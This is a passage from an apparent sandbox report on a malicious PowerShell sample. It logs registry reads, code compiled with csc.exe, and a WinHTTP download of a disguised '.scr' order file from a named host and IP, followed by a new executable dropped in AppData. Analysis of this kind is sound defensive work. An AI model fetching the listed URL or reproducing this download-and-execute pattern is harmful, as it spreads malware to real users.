| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline" | os_pid = 0xacc, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Roaming\z79473a.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | - | type = PROCESS_BASIC_INFORMATION |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | amsi.dll | base_address = 0x0 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | amsi.dll | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (10)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (134)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
126 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = jadema.com.py, address_out = 192.185.73.158 |
|
1 |
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 120 bytes |
| Total Data Received | 858.78 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 192.185.73.158:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0x4e0 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_TCP |
| Remote Address | 192.185.73.158 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49162 |
| Data Sent | 120 bytes |
| Data Received | 858.78 KB |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 192.185.73.158, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 120, size_out = 120 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 9044 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 43248 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 12588 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8760 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 61320 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8760 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23360 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 64240 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 26280 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6004 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6004 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 40880 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 17520 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 46720 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 17520 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 46720 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 64240 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23360 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6004 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 33580 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2920 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 65536, size_out = 65536 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 37137, size_out = 7464 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 29673, size_out = 29673 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 120 bytes |
| Total Data Received | 858.78 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | jadema.com.py |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | da2f925 |
| Server Name | jadema.com.py |
| Server Port | 80 |
| Data Sent | 120 |
| Data Received | 879393 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = da2f925, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = jadema.com.py, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /jj/2019%20Order%20File%20TTYYUGH.scr |
|
1 | |
| Send HTTP Request | headers = host: jadema.com.py, connection: Keep-Alive, user-agent: da2f925, url = jadema.com.py/jj/2019%20Order%20File%20TTYYUGH.scr |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 9044 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 43248 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 12588 |
|
1 | |
| Read Response | size = 65536, size_out = 8760 |
|
1 | |
| Read Response | size = 65536, size_out = 61320 |
|
1 | |
| Read Response | size = 65536, size_out = 8760 |
|
1 | |
| Read Response | size = 65536, size_out = 23360 |
|
1 | |
| Read Response | size = 65536, size_out = 64240 |
|
1 | |
| Read Response | size = 65536, size_out = 26280 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 6004 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 6004 |
|
1 | |
| Read Response | size = 65536, size_out = 40880 |
|
1 | |
| Read Response | size = 65536, size_out = 17520 |
|
1 | |
| Read Response | size = 65536, size_out = 46720 |
|
1 | |
| Read Response | size = 65536, size_out = 17520 |
|
1 | |
| Read Response | size = 65536, size_out = 46720 |
|
1 | |
| Read Response | size = 65536, size_out = 64240 |
|
1 | |
| Read Response | size = 65536, size_out = 23360 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 6004 |
|
1 | |
| Read Response | size = 65536, size_out = 33580 |
|
1 | |
| Read Response | size = 65536, size_out = 2920 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 37137, size_out = 7464 |
|
1 | |
| Read Response | size = 29673, size_out = 29673 |
|
1 | |
| Close Session | - |
|
1 |
Process #3: csc.exe
1
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe |
| Command Line | "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:45, Reason: Child Process |
| Unmonitor | End Time: 00:00:48, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xacc |
| Parent PID | 0xa00 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| csc.exe | 0x00400000 | 0x00418fff | Memory Mapped File | rwx |
|
|
|
- |
| cscompui.dll | 0x00420000 | 0x00442fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00450fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00570fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00580fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00740fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0085ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00b70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x01f7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001f80000 | 0x01f80000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x0216ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0230ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002320000 | 0x02320000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023a0000 | 0x023a0000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027a0000 | 0x027a0000 | 0x0299ffff | Private Memory | - |
|
|
|
- |
| sortdefault.nls | 0x029a0000 | 0x02c6efff | Memory Mapped File | r |
|
|
|
- |
| system.dll | 0x02c70000 | 0x02f7afff | Memory Mapped File | r |
|
|
|
- |
| system.management.automation.dll | 0x02f80000 | 0x0325efff | Memory Mapped File | r |
|
|
|
- |
| mscorlib.dll | 0x03260000 | 0x036bafff | Memory Mapped File | r |
|
|
|
- |
| msvcr80.dll | 0x74e60000 | 0x74f28fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| diasymreader.dll | 0x516f00000 | 0x516fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| cscomp.dll | 0x538000000 | 0x5381e8fff | Memory Mapped File | rwx |
|
|
|
- |
| alink.dll | 0x59c800000 | 0x59c822fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorpe.dll | 0x7fede640000 | 0x7fede66bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2b60000 | 0x7fee34fcfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5c80000 | 0x7fee5d18fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fef2ea0000 | 0x7fef2f0efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefc6f0000 | 0x7fefc6fbfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | E5CB7A31-7512-11D2-89CE-0080C792E5D8 | 31BCFCE2-DAFB-11D2-9F81-00C04F79A0A3 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Process #4: cvtres.exe
0
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe |
| Command Line | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESB625.tmp" "c:\Users\aETAdzjz\AppData\Local\Temp\CSCB615.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:46, Reason: Child Process |
| Unmonitor | End Time: 00:00:48, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
